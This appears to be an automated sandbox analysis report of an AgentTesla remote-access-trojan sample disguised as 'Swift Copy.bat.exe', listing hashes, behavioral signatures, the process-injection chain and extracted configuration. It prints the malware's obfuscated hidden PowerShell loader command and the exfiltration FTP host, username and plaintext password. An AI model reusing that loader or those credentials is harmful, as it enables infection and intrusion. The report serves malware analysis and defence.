Analysis
- max time kernel: 144s
- max time network: 150s
- platform: windows10-2004_x64
- resource: win10v2004-20241007-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 11-11-2024 16:17
Static task: static1
Behavioral task: behavioral1
- Sample: Swift Copy.bat.exe
- Resource: win7-20240729-en
Behavioral task: behavioral2
- Sample: Swift Copy.bat.exe
- Resource: win10v2004-20241007-en
Behavioral task: behavioral3
- Sample: Overkeenly.ps1
- Resource: win7-20241010-en
Behavioral task: behavioral4
- Sample: Overkeenly.ps1
- Resource: win10v2004-20241007-en
General
- Target: Swift Copy.bat.exe
- Size: 979KB
- MD5: 411ad554068219f2ed0ce5e74f02d542
- SHA1: 917cc7780771e518c544338e24204471c54ec5fa
- SHA256: 59b03fee31c5c62caac3b05827d210553ce84a6e7c5ae43cb7d34f8242d9bae6
- SHA512: 6dbd1cffd8e580bb8737e00e6c85a63d8092edb2db2028d671241fc1223e58d254a13adfe1ee05574a98be8ec471566bba7d73e2d73d30ba1805d35615c3e090
- SSDEEP: 24576:i/Vwqfj3y6EQ4Dsv+G/9nRn0fyVPiDrNEtEBkvUEZmWwH+EP0R/tF25taZScLvci:0Vwqfj3y6EQ4Dsv+G/910fyVPiDrNEt1
Malware Config
Extracted
- Protocol: ftp
- Host: ftp.concaribe.com
- Port: 21
- Username: [email protected]
- Password: ro}UWgz#!38E
Extracted (agenttesla)
- Protocol: ftp
- Host: ftp://ftp.concaribe.com
- Port: 21
- Username: [email protected]
- Password: ro}UWgz#!38E
Signatures
- AgentTesla
  Agent Tesla is a remote access tool (RAT) written in Visual Basic.
- Agenttesla family
- Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
  Runs PowerShell with the display window hidden.
- Blocklisted process makes network request (4 IoCs)
  Processes (flow, pid, process):
  - flow 19: 1560 msiexec.exe
  - flow 22: 1560 msiexec.exe
  - flow 25: 1560 msiexec.exe
  - flow 26: 1560 msiexec.exe
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes (flow, ioc):
  - flow 21: api.ipify.org
  - flow 22: api.ipify.org
- Drops file in System32 directory (1 IoCs)
  Processes (description, ioc, process):
  - File opened for modification: C:\Windows\SysWOW64\nonpurchasable.ini (Swift Copy.bat.exe)
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoCs)
  Processes (pid, process):
  - 1560 msiexec.exe
- Suspicious use of NtSetInformationThreadHideFromDebugger (2 IoCs)
  Processes (pid, process):
  - 5052 powershell.exe
  - 1560 msiexec.exe
- Drops file in Windows directory (2 IoCs)
  Processes (description, ioc, process):
  - File opened for modification: C:\Windows\resources\Bondefangeren\hofdamer.for (Swift Copy.bat.exe)
  - File opened for modification: C:\Windows\resources\0409\filbetegnelsernes\ophovnede.fer (Swift Copy.bat.exe)
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Processes (description, ioc, process):
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (Swift Copy.bat.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (powershell.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (msiexec.exe)
- Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes (pid, process):
  - 5052 powershell.exe (7 occurrences)
  - 1560 msiexec.exe (2 occurrences)
- Suspicious behavior: MapViewOfSection (1 IoCs)
  Processes (pid, process):
  - 5052 powershell.exe
- Suspicious use of AdjustPrivilegeToken (23 IoCs)
  Processes (token, pid, process):
  - SeDebugPrivilege: 5052 powershell.exe
  - SeIncreaseQuotaPrivilege: 5052 powershell.exe
  - SeSecurityPrivilege: 5052 powershell.exe
  - SeTakeOwnershipPrivilege: 5052 powershell.exe
  - SeLoadDriverPrivilege: 5052 powershell.exe
  - SeSystemProfilePrivilege: 5052 powershell.exe
  - SeSystemtimePrivilege: 5052 powershell.exe
  - SeProfSingleProcessPrivilege: 5052 powershell.exe
  - SeIncBasePriorityPrivilege: 5052 powershell.exe
  - SeCreatePagefilePrivilege: 5052 powershell.exe
  - SeBackupPrivilege: 5052 powershell.exe
  - SeRestorePrivilege: 5052 powershell.exe
  - SeShutdownPrivilege: 5052 powershell.exe
  - SeDebugPrivilege: 5052 powershell.exe
  - SeSystemEnvironmentPrivilege: 5052 powershell.exe
  - SeRemoteShutdownPrivilege: 5052 powershell.exe
  - SeUndockPrivilege: 5052 powershell.exe
  - SeManageVolumePrivilege: 5052 powershell.exe
  - 33: 5052 powershell.exe
  - 34: 5052 powershell.exe
  - 35: 5052 powershell.exe
  - 36: 5052 powershell.exe
  - SeDebugPrivilege: 1560 msiexec.exe
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes (description, pid, process, procid_target):
  - PID 3716 wrote to memory of 5052: 3716 Swift Copy.bat.exe, target 84 (3 occurrences)
  - PID 5052 wrote to memory of 1560: 5052 powershell.exe, target 98 (4 occurrences)
Processes
- C:\Users\Admin\AppData\Local\Temp\Swift Copy.bat.exe (level 1)
  Command line: "C:\Users\Admin\AppData\Local\Temp\Swift Copy.bat.exe"
  PID: 3716
  - Drops file in System32 directory
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (level 2)
    Command line: powershell.exe -windowstyle hidden "$Markgreven=Get-Content -raw 'C:\Users\Admin\AppData\Local\Temp\bruised\calypsoerne\drikkelaget\Overkeenly.Aut';$Fortykkelsernes=$Markgreven.SubString(3059,3);.$Fortykkelsernes($Markgreven)"
    PID: 5052
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of NtSetInformationThreadHideFromDebugger
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\msiexec.exe (level 3)
      Command line: "C:\Windows\SysWOW64\msiexec.exe"
      PID: 1560
      - Blocklisted process makes network request
      - Suspicious use of NtCreateThreadExHideFromDebugger
      - Suspicious use of NtSetInformationThreadHideFromDebugger
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads